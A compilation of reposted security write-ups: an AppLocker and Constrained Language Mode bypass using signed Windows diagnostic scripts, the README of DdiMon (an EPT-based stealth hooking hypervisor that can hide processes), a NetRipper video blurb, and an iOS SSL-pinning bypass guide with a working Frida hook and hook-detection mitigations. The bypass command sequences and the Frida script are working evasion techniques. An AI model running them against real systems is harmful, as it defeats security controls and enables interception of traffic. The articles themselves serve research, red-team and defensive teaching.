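The second example mirrors the last rule in the README: 52.23.194.42 once, then the default address for every later query.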
Testing

A whonow server must be running on localhost:15353 to perform the tests in test.js:

# in one terminal
whonow -p 15353
# in another terminal
cd path/to/node_modules/whonow
npm test

Sursa: https://github.com/brannondorsey/whonow
Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts

JANUARY 7, 2018 ~ BOHOPS

Introduction

Last week, I was hunting around the Windows operating system for interesting scripts and binaries that may be useful for future penetration tests and red team engagements. With increased client-side security, awareness, and monitoring (e.g. AppLocker, Device Guard, AMSI, PowerShell ScriptBlock Logging, PowerShell Constrained Language Mode, User Mode Code Integrity, HIDS/anti-virus, the SOC, etc.), looking for ways to deceive, evade, and/or bypass security solutions has become a significant component of the ethical hacker's playbook.

While hunting, I came across an interesting directory structure that contained diagnostic scripts located at the following 'parent' path:

%systemroot%\diagnostics\system\

In particular, two subdirectories (\AERO and \Audio) contained two very interesting, signed PowerShell scripts:

CL_Invocation.ps1
CL_LoadAssembly.ps1

CL_Invocation.ps1 provides a function (SyncInvoke) to execute binaries through System.Diagnostics.Process, and CL_LoadAssembly.ps1 provides two functions (LoadAssemblyFromNS and LoadAssemblyFromPath) for loading .NET/C# assemblies (DLLs/EXEs).

Analysis of CL_Invocation.ps1

While investigating this script, it was quite apparent that executing commands would be very easy, as demonstrated in the following screenshot:

Importing the module and using SyncInvoke is straightforward, and command execution is successfully achieved through:

. CL_Invocation.ps1 (or import-module CL_Invocation.ps1)
SyncInvoke <command> <arg...>

However, further research indicated that this technique did not bypass any protections in subsequent testing efforts. PowerShell Constrained Language Mode (in PSv5) prevented the execution of certain PowerShell code/scripts, and default AppLocker policies prevented the execution of unsigned binaries under the context of an unprivileged account.
Still, CL_Invocation.ps1 may have merit within trusted execution chains and for evading defender analysis when combined with other techniques.

**Big thanks to @Oddvarmoe and @xenosCR for their help and analysis of CL_Invocation

Analysis of CL_LoadAssembly.ps1

While investigating CL_LoadAssembly, I found a very interesting write-up (Applocker Bypass-Assembly Load) by @netbiosX that describes research conducted by Casey Smith (@subTee) during a presentation at Shmoocon 2015. He successfully discovered an AppLocker bypass through the use of loading assemblies within PowerShell by URL, file location, and byte code. Additionally, @subTee alluded to a bypass technique with CL_LoadAssembly in a Tweet posted a few years ago:

In order to test this method, I compiled a very basic program (assembly) in C# (Target Framework: .NET 2.0) that I called funrun.exe, which runs calc.exe via proc.start() if (successfully) executed:

Using a Windows 2016 machine with default AppLocker rules under an unprivileged user context, the user attempted to execute funrun.exe directly. When called from the command line and PowerShell (v5), this was prevented by policy as shown in the following screenshot:

funrun.exe was also prevented by policy when run under PowerShell version 2:

Using CL_LoadAssembly, the user successfully loads the assembly with a path traversal call to funrun.exe. However, Constrained Language mode prevented the user from calling the method in PowerShell (v5) as indicated in the following screenshot:

To bypass Constrained Language mode, the user invokes PowerShell v2 and successfully loads the assembly with a path traversal call to funrun.exe:

The user calls the funrun assembly method and spawns calc.exe:

Success! As an unprivileged user, we proved that we could bypass Constrained Language mode by invoking PowerShell version 2 (note: this must be enabled) and bypassed AppLocker by loading an assembly through CL_LoadAssembly.ps1.
For completeness, here is the CL sequence:

powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\temp\funrun.exe
[funrun.hashtag]::winning()

AppLocker Bypass Resources

For more information about AppLocker bypass techniques, I highly recommend checking out The Ultimate AppLocker Bypass List created and maintained by Oddvar Moe (@Oddvarmoe). Also, these resources were very helpful while drafting this post:

- AppLocker Bypass-Assembly Load – https://pentestlab.blog/tag/assembly-load/
- C# to Windows Meterpreter in 10 min – https://holdmybeersecurity.com/2016/09/11/c-to-windows-meterpreter-in-10mins/

Conclusion

Well folks, that covers interesting code execution and AppLocker bypass vectors to incorporate into your red team/pen test engagements. Please feel free to contact me or leave a message if you have any other questions/comments. Thank you for reading!

Sursa: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Pentester Academy TV
Published Mar 28, 2018

Today's episode of The Tool Box features NetRipper. We break down everything you need to know, including what it does, who it was developed by, and the best ways to use it!

Check out NetRipper here:
Github - https://github.com/NytroRST/NetRipper

Send your tool to: media@pentesteracademy.com for consideration

Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news!

Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/

FOLLOW US ON:
~Facebook: http://bit.ly/2uS4pK0
~Twitter: http://bit.ly/2vd5QSE
~Instagram: http://bit.ly/2v0tnY8
~LinkedIn: http://bit.ly/2ujkyeC
~Google +: http://bit.ly/2tNFXtc
~Web: http://bit.ly/29dtbcn
DdiMon

Introduction

DdiMon is a hypervisor performing inline hooking that is invisible to a guest (i.e., any code other than DdiMon) by using extended page tables (EPT). DdiMon is meant to be an educational tool for understanding how to use EPT from a programming perspective for research. To demonstrate this, DdiMon installs invisible inline hooks on the following device driver interfaces (DDIs) to monitor activities of the Windows built-in kernel patch protection, a.k.a. PatchGuard, and to hide certain processes without being detected by PatchGuard:

- ExQueueWorkItem
- ExAllocatePoolWithTag
- ExFreePool
- ExFreePoolWithTag
- NtQuerySystemInformation

Those stealth shadow hooks are hidden from the guest's read and write memory operations and exposed only on execution of the memory. Therefore, they are neither visible nor overwritable from a guest, while they function as ordinary hooks. This is accomplished by making use of EPT, forcing a guest to see different memory contents from what it would see if EPT were not in use. This technique is often called memory shadowing. For more details, see the Design section below.

Here is a movie demonstrating that shadow hooks allow you to monitor and control DDI calls without being noticed by PatchGuard: https://www.youtube.com/watch?v=UflyX3GeYkw

DdiMon is implemented on top of HyperPlatform. See the project page for more details on HyperPlatform: https://github.com/tandasat/HyperPlatform

Installation and Uninstallation

Clone the full source code from GitHub with the command below and compile it in Visual Studio:

$ git clone --recursive https://github.com/tandasat/DdiMon.git

On the x64 platform, you have to enable test signing to install the driver. To do that, open the command prompt with administrator privileges, type the following command, and then restart the system to activate the change:

>bcdedit /set testsigning on

To install and uninstall the driver, use the 'sc' command.
For installation:

>sc create DdiMon type= kernel binPath= C:\Users\user\Desktop\DdiMon.sys
>sc start DdiMon

And for uninstallation:

>sc stop DdiMon
>sc delete DdiMon
>bcdedit /deletevalue testsigning

Note that the system must support the Intel VT-x and EPT technology to successfully install the driver. To install the driver on a virtual machine on VMware Workstation, see the "Using VMware Workstation" section in the HyperPlatform User Document: http://tandasat.github.io/HyperPlatform/userdocument/

Output

All logs are printed out to DbgView and saved in C:\Windows\DdiMon.log.

Motivation

Despite the existence of plenty of academic research projects [1,2,3] and production software [4,5], EPT (a.k.a. SLAT; second-level address translation) is still an underused technology among reverse engineers due to a lack of information on how it works and how to control it through programming. MoRE [6] by Jacob Torrey is one of very few open source projects demonstrating the use of EPT with a small amount of code. While we recommend looking into that project for a basic comprehension of how EPT can be initialized and used to set up more than 1:1 guest-to-machine physical memory mapping, MoRE lacks the flexibility to extend its code for supporting broader platforms and implementing your own analysis tools. DdiMon provides a similar sample use of EPT as what MoRE does, with a greater range of platform support such as x64 and/or Windows 10. DdiMon can also be seen as an example extension of HyperPlatform for memory virtualization.
[1] SecVisor: A Tiny Hypervisor to Provide Lifetime Kernel Code Integrity for Commodity OSes - https://www.cs.cmu.edu/~arvinds/pubs/secvisor.pdf
[2] SPIDER: Stealthy Binary Program Instrumentation and Debugging via Hardware Virtualization - https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2013-5.pdf
[3] Dynamic VM Dependability Monitoring Using Hypervisor Probes - http://assured-cloud-computing.illinois.edu/files/2014/03/Dynamic-VM-Dependability-Monitoring-Using-Hypervisor-Probes.pdf
[4] Windows 10 Virtualization-based Security (Device Guard) - https://technet.microsoft.com/en-us/library/mt463091(v=vs.85).aspx
[5] VMRay - https://www.vmray.com/features/
[6] MoRE - https://github.com/ainfosec/MoRE

Design

In order to install a shadow hook, DdiMon creates a couple of copies of the page where the address to install a hook belongs. After DdiMon is initialized, those two pages are accessed whenever a guest (namely, anything but the hypervisor, i.e. DdiMon) attempts to access the original page. For example, when DdiMon installs a hook onto 0x1234, two copied pages are created: 0xa000 for execution access and 0xb000 for read or write access, and memory access is performed as below after the hook is activated:

                Requested -> Accessed
By hypervisor:  0x1234    -> 0x1234 on all access
By guest:       0x1234    -> 0xa234 on execution access
                          -> 0xb234 on read or write access

The following explains how this is accomplished.

Default state

DdiMon first configures an EPT entry corresponding to 0x1000-0x1fff to refer to the contents of 0xa000 and to disallow read and write access to the page.

Scenario: Read or Write

With this configuration, any read or write access triggers an EPT violation VM-exit. Upon the VM-exit, the EPT entry for 0x1000-0x1fff is modified to refer to the contents of 0xb000, which is a copy of 0x1000, and to allow read and write access to the page.
Then, the hypervisor sets the Monitor Trap Flag (MTF), which works like the Trap Flag of the flags register but is not visible to a guest, so that the guest can perform the read or write operation and then be interrupted by the hypervisor with an MTF VM-exit.

After executing a single instruction, the guest is interrupted by the MTF VM-exit. On this VM-exit, the hypervisor clears the MTF and resets the EPT entry to the default state so that subsequent execution is done with the contents of 0xa000. As a result of this sequence of operations, the guest has executed a single instruction reading from or writing to 0xb234.

Scenario: Execute

Execution runs against the contents of 0xa000 without triggering any events unless additional configuration is made. In order to monitor execution of 0xa234 (0x1234 from the guest's perspective), DdiMon sets a breakpoint (0xcc) at 0xa234 and handles #BP in the hypervisor. The following steps show how DdiMon hooks execution of 0xa234:

On the #BP VM-exit, the hypervisor first checks whether the guest's EIP/RIP is 0x1234. If so, the hypervisor changes the contents of the register to point to a corresponding hook handler for instrumenting the DDI call. On VM-enter, the guest executes the hook handler. The hook handler calls the original function, examines parameters, return values and/or a return address, and takes action accordingly.

This is just like typical inline hooking. The only differences are that it sets 0xcc and changes EIP/RIP from a hypervisor instead of overwriting the original code with JMP instructions, and that installed hooks are not visible from a guest. An advantage of using 0xcc is that it does not require a target function to be long enough to install JMP instructions.

Implementation

The following is a call hierarchy with regard to the sequences explained above.
On DriverEntry:
  DdimonInitialization()
    DdimonpEnumExportedSymbolsCallback()  // Enumerates exports of ntoskrnl
      ShInstallHook()                     // Installs a stealth hook
  ShEnableHooks()                         // Activates installed hooks
    ShEnablePageShadowing()
      ShpEnablePageShadowingForExec()     // Configures an EPT entry as
                                          // explained in "Default state"

On EPT violation VM-exit with read or write:
  VmmpHandleEptViolation()
    EptHandleEptViolation()
      ShHandleEptViolation()   // Performs actions as explained in step 1 of
                               // "Scenario: Read or Write"

On MTF VM-exit:
  VmmpHandleMonitorTrap()
    ShHandleMonitorTrapFlag()  // Performs actions as explained in step 2 of
                               // "Scenario: Read or Write"

On #BP VM-exit:
  VmmpHandleException()
    ShHandleBreakpoint()       // Performs actions as explained in step 1 of
                               // "Scenario: Execute"

Implemented Hook Handlers

- ExQueueWorkItem - The hook handler prints out given parameters when a specified work item routine is not inside any images.
- ExAllocatePoolWithTag - The hook handler prints out given parameters and a return value of ExAllocatePoolWithTag() when it is called from an address not backed by any images.
- ExFreePool and ExFreePoolWithTag - The hook handlers print out given parameters when they are called from addresses not backed by any images.
- NtQuerySystemInformation - The hook handler takes out an entry for "cmd.exe" from returned process information so that cmd.exe is not listed by process enumeration.

The easiest way to see those logs is installing NoImage.sys.
https://github.com/tandasat/MemoryMon/tree/master/MemoryMonTest

Logs for activities of NoImage look like this:

17:59:23.014 INF #0 4 48 System 84660265: ExFreePoolWithTag(P= 84665000, Tag= nigm)
17:59:23.014 INF #0 4 48 System 84660283: ExAllocatePoolWithTag(POOL_TYPE= 00000000, NumberOfBytes= 00001000, Tag= nigm) => 8517B000
17:59:23.014 INF #0 4 48 System 8517B1C3: ExQueueWorkItem({Routine= 8517B1D4, Parameter= 8517B000}, 1)

Caveats

DdiMon is meant to be an educational tool and not robust, production-quality software able to handle various edge cases. For example, DdiMon does not handle self-modifying code, since any memory write to a shadowed page is not reflected in the view used for execution. For this reason, researchers are encouraged to use this project as sample code to get familiar with EPT and to develop their own tools as needed.

Supported Platforms

- x86 and x64 Windows 7, 8.1 and 10
- The system must support the Intel VT-x and EPT technology

License

This software is released under the MIT License, see LICENSE.

Sursa: https://github.com/tandasat/DdiMon
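As a footnote to the Design section above, the two-view translation can be modeled in a few lines. This is a toy Python simulation of the idea only (my own illustration, not DdiMon's code): one guest page gets an execute view with 0xCC planted at the hook address and a read/write view with the original bytes, and the EPT-violation handling routes each access to the right view.

```python
# Toy model of DdiMon-style page shadowing: two shadow copies of one
# guest page, selected by access type, as in the Design section.

class ShadowPage:
    def __init__(self, original: bytes, hook_offset: int):
        self.rw_view = bytearray(original)    # what the guest reads/writes
        self.exec_view = bytearray(original)  # what the guest executes
        self.exec_view[hook_offset] = 0xCC    # breakpoint for the hypervisor

    def access(self, offset: int, kind: str) -> int:
        # stand-in for the EPT violation handler: route the access
        # to the execute view or the read/write view
        view = self.exec_view if kind == "exec" else self.rw_view
        return view[offset]

# a fake 4 KiB page: a couple of prologue bytes, then NOPs (0x90)
page = ShadowPage(b"\x55\x89\xe5" + b"\x90" * (0x1000 - 3),
                  hook_offset=0x234)

# A guest scanning memory for hooks sees the original byte ...
read_byte = page.access(0x234, "read")
# ... while execution hits the hidden 0xCC and traps to the hypervisor.
exec_byte = page.access(0x234, "exec")
print(hex(read_byte), hex(exec_byte))
```

This is why the hooks are invisible to PatchGuard's integrity checks: the checks are reads, and reads never see the planted breakpoint.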
Prevent bypassing of SSL certificate pinning in iOS applications

TECHNOLOGY iOS

By: Dennis Frett - Software engineer

One of the first things an attacker will do when reverse engineering a mobile application is bypass the SSL/TLS (Secure Sockets Layer/Transport Layer Security) protection to gain better insight into the application's functioning and the way it communicates with its server. In this blog, we explain which techniques are used to bypass SSL pinning in iOS and which countermeasures can be taken.

What is SSL pinning?

When mobile apps communicate with a server, they typically use SSL to protect the transmitted data against eavesdropping and tampering. By default, SSL implementations used in apps trust any server with a certificate trusted by the operating system's trust store. This store is a list of certificate authorities that is shipped with the operating system. With SSL pinning, however, the application is configured to reject all but one or a few predefined certificates. Whenever the application connects to a server, it compares the server certificate with the pinned certificate(s). If and only if they match, the server is trusted and the SSL connection is established.

Why do we need SSL pinning?

Setting up and maintaining SSL sessions is usually delegated to a system library. This means that the application that tries to establish a connection does not determine which certificates to trust and which not. The application relies entirely on the certificates that are included in the operating system's trust store. A researcher who generates a self-signed certificate and includes it in the operating system's trust store can set up a man-in-the-middle attack against any app that uses SSL. This would allow him to read and manipulate every single SSL session. The attacker could use this ability to reverse engineer the protocol the app uses or to extract API keys from the requests.
Attackers can also compromise SSL sessions by tricking the user into installing a trusted CA through a malicious web page. Or the root CAs trusted by the device can get compromised and be used to generate certificates. Narrowing the set of trusted certificates through the implementation of SSL pinning effectively protects applications from the described remote attacks. It also prevents reverse engineers from adding a custom root CA to the store of their own device to analyze the functionality of the application and the way it communicates with the server. SSL pinning implementation in iOS SSL pinning is implemented by storing additional information inside the app to identify the server and ensure that no man-in-the-middle attack is being carried out. What to pin? Either the actual server certificate itself or the public key of the server is pinned. You can opt to store the exact data or a hash of that data. This can be a file hash of the certificate file or a hash of the public key string. The choice between pinning the certificate or the public key has a few implications for security and maintenance of the application. This lies outside the scope of this blog, but more information can be found here. Embedding pinned data The data required for SSL pinning can be embedded in the application in two ways: in an asset file or as a string in the actual code of the app. If you pin the certificate file, the certificate is usually embedded as an asset file. Each time an SSL connection is made, the received server certificate is compared to the known certificate(s) file(s). Only if the files match exactly, the connection is trusted. When pinning the public key of the server, the key can be embedded as a string in the application code or it can be stored in an asset file. Whenever an SSL connection is made, the public key is extracted from the received server certificate and compared to the stored string. If the strings match exactly, the connection is trusted. 
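For reference, a public key pin of the kind TrustKit uses is the base64 encoding of the SHA-256 digest of the server's DER-encoded SubjectPublicKeyInfo. A short Python sketch of the computation (the openssl pipeline in the comment is the usual way to obtain the SPKI bytes; the demo input is dummy data, not a real key):

```python
import base64
import hashlib

def spki_pin(spki_der: bytes) -> str:
    """base64(SHA-256(SubjectPublicKeyInfo)) -- the pin format TrustKit
    expects in kTSKPublicKeyHashes.

    Obtaining the DER-encoded SPKI from a certificate is typically done
    with openssl, e.g.:
      openssl x509 -in cert.pem -pubkey -noout |
        openssl pkey -pubin -outform DER
    """
    digest = hashlib.sha256(spki_der).digest()
    return base64.b64encode(digest).decode("ascii")

# demo with dummy bytes -- a real SPKI is a DER structure from the cert
demo_pin = spki_pin(b"\x30\x82\x01\x22dummy-spki-bytes")
print(demo_pin)
```

Because the digest is always 32 bytes, a valid pin is always 44 base64 characters ending in "=", which is a quick sanity check on configured pins.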
Popular Options

The following libraries are popular options for implementing SSL pinning in Swift and Objective-C iOS applications.

Name         | Pinning implementation       | Language    | Type
-------------|------------------------------|-------------|--------------------------
NSURLSession | Certificate file, public key | Objective-C | Apple networking library
AlamoFire    | Certificate file, public key | Swift       | Networking library
AFNetworking | Certificate file, public key | Objective-C | Networking library
TrustKit     | Public key                   | Objective-C | SSL pinning

NSURLSession is Apple's API for facilitating network communication. It is a low-level framework, so implementing SSL pinning with it is hard and requires a lot of manual checks. TrustKit, AlamoFire and AFNetworking are widely used frameworks built on top of NSURLSession. Both AFNetworking and AlamoFire are full-fledged networking libraries that support SSL pinning checks as part of their API. TrustKit is a small framework that only implements SSL pinning checks. AFNetworking for Objective-C apps or AlamoFire for Swift apps are good choices when you are looking for a complete network library. If you only need SSL pinning, TrustKit is a good option.

Bypass SSL pinning protection

Bypassing SSL pinning can be achieved in one of two ways:
- By avoiding the SSL pinning check or discarding the result of the check.
- By replacing the pinned data in the application, for example the certificate asset or the hashed key.

In the next sections, we will demonstrate both methods using a sample application and provide some suggestions on how to prevent tampering attempts.

Test setup and goal

We will show how to bypass TrustKit SSL pinning in the TrustKit demo application running on a jailbroken iPhone. We will be using the following tools:

- mitmproxy is used to analyze what data is being sent over the network. Alternative tools would be Burp Suite or Charles.
- Frida is used for hooking and patching methods. Other popular hooking frameworks are Cydia Substrate, Cycript or Substitute.
To replace strings in the binary, we will use the Hopper disassembler.

The TrustKit demo application has minimal functionality. It only tries to connect to https://www.yahoo.com/ using an invalid pinned hash for that domain.

let trustKitConfig: [String: Any] = [
    kTSKSwizzleNetworkDelegates: false,
    kTSKPinnedDomains: [
        "yahoo.com": [
            kTSKEnforcePinning: true,
            kTSKIncludeSubdomains: true,
            kTSKPublicKeyAlgorithms: [kTSKAlgorithmRsa2048],
            // Invalid pins to demonstrate a pinning failure
            kTSKPublicKeyHashes: [
                "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
                "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB="
            ],
            kTSKReportUris: ["https://overmind.datatheorem.com/trustkit/report"],
        ],
        …

Note that even if the supplied hashes were valid for the yahoo.com domain, SSL pinning validation should still fail as long as we're using a man-in-the-middle proxy. When connecting to yahoo.com, mitmproxy shows us that the domain is not actually visited. Only the report of the SSL pinning verification is sent to the configured servers. The device itself displays a message that the pinning validation failed. All of this is expected behavior since SSL pinning is enabled.

Avoiding the SSL pinning check

We will explain how to bypass the SSL pinning check with Frida. Before we can try to bypass it, we need to find out where in the code the actual SSL pinning check is performed.

Finding the check

Since TrustKit is open source, we can easily find out where the actual certificate validation logic takes place: -[TSKPinningValidator evaluateTrust:forHostname:]. In cases in which the source code is not available, a good look at the API of the SSL pinning library will usually reveal where the actual validation work is done. The signature of evaluateTrust:forHostname: contains a lot of information about the method.
```objc
- (TSKTrustDecision)evaluateTrust:(SecTrustRef _Nonnull)serverTrust
                      forHostname:(NSString * _Nonnull)serverHostname
```

The method is passed two arguments, including the hostname of the server that is being contacted, and it returns a TSKTrustDecision. The decision is based on a simple enum of evaluation results.

```objc
/**
 Possible return values when verifying a server's identity against a set of pins.
 */
typedef NS_ENUM(NSInteger, TSKTrustEvaluationResult)
{
    TSKTrustEvaluationSuccess,
    TSKTrustEvaluationFailedNoMatchingPin,
    TSKTrustEvaluationFailedInvalidCertificateChain,
    TSKTrustEvaluationErrorInvalidParameters,
    TSKTrustEvaluationFailedUserDefinedTrustAnchor,
    TSKTrustEvaluationErrorCouldNotGenerateSpkiHash,
};
```

The source code documents each of these fields, but it is clear that the most interesting value is TSKTrustEvaluationSuccess.

Bypassing the check

To bypass the TrustKit SSL pinning check, we will hook the -[TSKPinningValidator evaluateTrust:forHostname:] method using Frida and ensure it always returns the required value. First, we create a Frida instrumentation script and save it as disable_trustkit.js.

```javascript
var evalTrust = ObjC.classes.TSKPinningValidator["- evaluateTrust:forHostname:"];

Interceptor.attach(evalTrust.implementation, {
    onLeave: function(retval) {
        console.log("Current return value: " + retval);
        retval.replace(0);
        console.log("Return value replaced with (TSKTrustDecision) " +
                    "TSKTrustDecisionShouldAllowConnection");
    }
});
```

This script attaches Frida to the evaluateTrust:forHostname: instance method of the TSKPinningValidator class and executes the given code each time this method returns. The code replaces the return value with 0 (TSKTrustDecisionShouldAllowConnection) regardless of its previous value, and logs what it did.

We launch Frida, attach to the TrustKitDemo process on our device, and execute our script:

```
frida -U -l disable_trustkit.js -n TrustKitDemo-Swift
```

If we now try to load https://www.yahoo.com, mitmproxy shows that the URL was loaded successfully.
The device also shows that the pin validation succeeded. Locally, Frida prints the following output, showing that the hook did what we expected.

```
[iPhone::TrustKitDemo-Swift]-> Current return value: 0x1
Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection
Current return value: 0x1
Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection
```

We have now successfully bypassed TrustKit SSL pinning and are able to view and modify all web requests. Of course, this is only a very basic example of bypassing a single SSL pinning implementation by changing a return value.

Off-the-shelf tools

Bypassing SSL pinning can be accomplished even more easily using existing tweaks for jailbroken devices. SSL Kill Switch 2, for example, patches the low-level iOS TLS stack, disabling all SSL pinning implementations that use it. The Objection SSL pinning disabler for Frida implements the low-level checks of SSL Kill Switch 2 and extends these with a few framework-specific hooks. The following table outlines the methods that can be hooked for some SSL pinning frameworks.

| Framework | Hooked methods |
| --- | --- |
| libcoretls_cfhelpers.dylib | tls_helper_create_peer_trust |
| NSURLSession | -[* URLSession:didReceiveChallenge:completionHandler:] |
| NSURLConnection | -[* connection:willSendRequestForAuthenticationChallenge:] |
| AFNetworking | -[AFSecurityPolicy setSSLPinningMode:], -[AFSecurityPolicy setAllowInvalidCertificates:], +[AFSecurityPolicy policyWithPinningMode:], +[AFSecurityPolicy policyWithPinningMode:withPinnedCertificates:] |

Mitigation: detect hooking

Before verifying the SSL pin, we can verify the integrity of the functions above. As an example, we'll use SSL Kill Switch 2, which is built on top of Cydia Substrate, a commonly used framework for writing runtime hooks. Hooking in this framework is done through the MSHookFunction API.

The method explained here is a proof of concept. Don't use this hook detection code in production software.
It is very basic, only detects a specific kind of hook on ARM64, and, used without any additional obfuscation, would be very easy to remove.

A common way of hooking native functions is to overwrite their first couple of instructions with a 'trampoline': a set of instructions responsible for diverting control flow to a new code fragment that replaces or augments the original behavior. Using lldb, we can see exactly what this trampoline looks like.

First 10 instructions of the unhooked function:

```
(lldb) dis -n tls_helper_create_peer_trust
libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust:
    0x1a8c13514 <+0>:  stp    x26, x25, [sp, #-0x50]!
    0x1a8c13518 <+4>:  stp    x24, x23, [sp, #0x10]
    0x1a8c1351c <+8>:  stp    x22, x21, [sp, #0x20]
    0x1a8c13520 <+12>: stp    x20, x19, [sp, #0x30]
    0x1a8c13524 <+16>: stp    x29, x30, [sp, #0x40]
    0x1a8c13528 <+20>: add    x29, sp, #0x40    ; =0x40
    0x1a8c1352c <+24>: sub    sp, sp, #0x20     ; =0x20
    0x1a8c13530 <+28>: mov    x19, x2
    0x1a8c13534 <+32>: mov    x24, x1
    0x1a8c13538 <+36>: mov    x21, x0
```

First 10 instructions of the hooked function:

```
(lldb) dis -n tls_helper_create_peer_trust
libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust:
    0x1a8c13514 <+0>:  ldr    x16, #0x8         ; <+8>
    0x1a8c13518 <+4>:  br     x16
    0x1a8c1351c <+8>:  .long  0x00267c2c        ; unknown opcode
    0x1a8c13520 <+12>: .long  0x00000001        ; unknown opcode
    0x1a8c13524 <+16>: stp    x29, x30, [sp, #0x40]
    0x1a8c13528 <+20>: add    x29, sp, #0x40    ; =0x40
    0x1a8c1352c <+24>: sub    sp, sp, #0x20     ; =0x20
    0x1a8c13530 <+28>: mov    x19, x2
    0x1a8c13534 <+32>: mov    x24, x1
    0x1a8c13538 <+36>: mov    x21, x0
```

In the hooked function, the first 16 bytes form the trampoline: the address 0x00000001002ebc2c is loaded into register x16, after which execution branches to that address (br x16).
This address refers to SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust, which is SSL Kill Switch 2's replacement implementation:

```
(lldb) dis -a 0x00000001002ebc2c
SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust:
    0x1002ebc2c <+0>:  sub    sp, sp, #0x20     ; =0x20
    0x1002ebc30 <+4>:  mov    w8, #0x0
    0x1002ebc34 <+8>:  str    x0, [sp, #0x18]
    0x1002ebc38 <+12>: strb   w1, [sp, #0x17]
    0x1002ebc3c <+16>: str    x2, [sp, #0x8]
    0x1002ebc40 <+20>: mov    x0, x8
    0x1002ebc44 <+24>: add    sp, sp, #0x20     ; =0x20
```

If a function's implementation is known in advance, its first few bytes can be compared to the known bytes, effectively 'pinning' the function implementation. For Cydia Substrate, we saw the function being patched with an unconditional branch to a register (BR Xn), so we can check whether such an instruction appears in the first few instructions. If a branch instruction is found, we assume the function is hooked; otherwise we assume it is valid. For demonstration purposes, this simplified assumption will suffice.

To find a good mask for detecting branch instructions, we had a look at the opcode tables in the GNU Binutils source code. The aarch64_opcode_table table contains the ARM64 opcodes together with a mask for each opcode.

```c
struct aarch64_opcode aarch64_opcode_table[] =
{
  ...
  /* Unconditional branch (register).  */
  {"br",  0xd61f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0},
  {"blr", 0xd63f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0},
  {"ret", 0xd65f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, F_OPD0_OPT | F_DEFAULT (30)},
  ...
```

The entries are aarch64_opcode structs. From the opcode mask (0xfffffc1f) and the instruction representations, we can deduce that an instruction word is an unconditional branch to a register exactly when masking it with 0xfffffc1f yields 0xD61F0000.

```c
// Only valid for ARM64.
int isSSLHooked()
{
    void* (*createTrustFunc)() = dlsym(RTLD_DEFAULT, "tls_helper_create_peer_trust");
    if (createTrustFunc == 0x0)
    {
        // Unable to find the symbol, assume the function is hooked.
        return 1;
    }

    unsigned int *createTrustFuncAddr = (unsigned int *) createTrustFunc;

    // Check whether one of the first three instructions is an
    // unconditional branch to a register (BR Xn).
    for (int i = 0; i < 3; i++)
    {
        unsigned int opCode = createTrustFuncAddr[i] & 0xfffffc1f;
        if (opCode == 0xD61F0000)
        {
            // Trampoline instruction found, the function is hooked.
            return 1;
        }
    }

    // The function is not hooked through a trampoline.
    return 0;
}
```

We can call this function before an SSL pinning check is performed, for example in loadUrl, and only start an SSL session if the checked function is not hooked.

Mitigation: name obfuscation

To bypass SSL pinning, the attacker first needs to find out which method to hook. By using a tool to obfuscate the Swift and Objective-C metadata in their iOS app, developers can make it much more difficult for the attacker to determine which methods to hook. Name obfuscation will also throw off automated tools that look for a known method name, and an obfuscator can rename methods differently in each build of the application, forcing an attacker to search for the actual names in every new version.

It is important to note that name obfuscation only protects against tools that bypass SSL checks implemented in the application's own code or in libraries included in the application. Tools that work by hooking system frameworks won't be deterred by it.

Replacing SSL pinning data

The other way to bypass SSL pinning is to replace the pinned data inside the application. If we can replace the original pinned certificate file or public key string with one that belongs to our man-in-the-middle server, we are effectively pinning our own server. Replacing an embedded certificate file can be as easy as swapping a file in the IPA package. In implementations that pin a hash of the server's public key, we can replace the string with the hash of our own public key.
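That last step can be made concrete. Public key pins such as TrustKit's kTSKPublicKeyHashes entries are the base64-encoded SHA-256 hash of the key's subjectPublicKeyInfo. The Python sketch below is an illustration only (it is not from the original post, and the byte string stands in for real DER-encoded key data); it computes the replacement value an attacker would patch into the binary:

```python
import base64
import hashlib

def public_key_pin(spki_der: bytes) -> str:
    """base64(SHA-256(subjectPublicKeyInfo)) -- the usual format for
    hard-coded public key pins such as TrustKit's kTSKPublicKeyHashes."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()

# Placeholder bytes standing in for the DER-encoded public key info
# of the attacker's man-in-the-middle certificate.
mitm_spki = b"hypothetical MITM SPKI DER"

# This 44-character string is what the attacker would swap into the
# binary in place of the original pinned hash.
replacement_pin = public_key_pin(mitm_spki)
print(len(replacement_pin))  # 44
```

Since SHA-256 always produces 32 bytes, every pin in this format is a 44-character base64 string, which makes the candidates easy to spot in a disassembler such as Hopper.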
The screenshot below shows the TrustKit demo application loaded into Hopper. Hopper allows us to replace strings in the Mach-O file and reassemble it into a valid executable. Once the file or the string is replaced, the app directory needs to be re-signed and zipped into an IPA. This lies outside the scope of this blog post, but more information can be found here.

Mitigation: string encryption

When pinning certificates with a list of hard-coded public key hashes, it is a good idea to encrypt the values. This doesn't protect against hooking, but it makes it much more difficult to replace the original hashes with those of an attacker's certificate, since the replacements would have to be correctly encrypted as well.

Mitigation: control flow obfuscation

A reverse engineer can analyze the control flow of the application to find the location where the actual hash is verified. If he succeeds in finding it, he can see which strings are used and locate the hash string in the binary. By obfuscating the control flow of the application, the developer makes such manual analysis of the code much more difficult.

Source: https://www.guardsquare.com/en/blog/iOS-SSL-certificate-pinning-bypassing
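The string-encryption mitigation above can be sketched in a few lines. This is a toy Python illustration, not from the original post: XOR stands in for a proper cipher, and the key and pin values are invented for the demonstration.

```python
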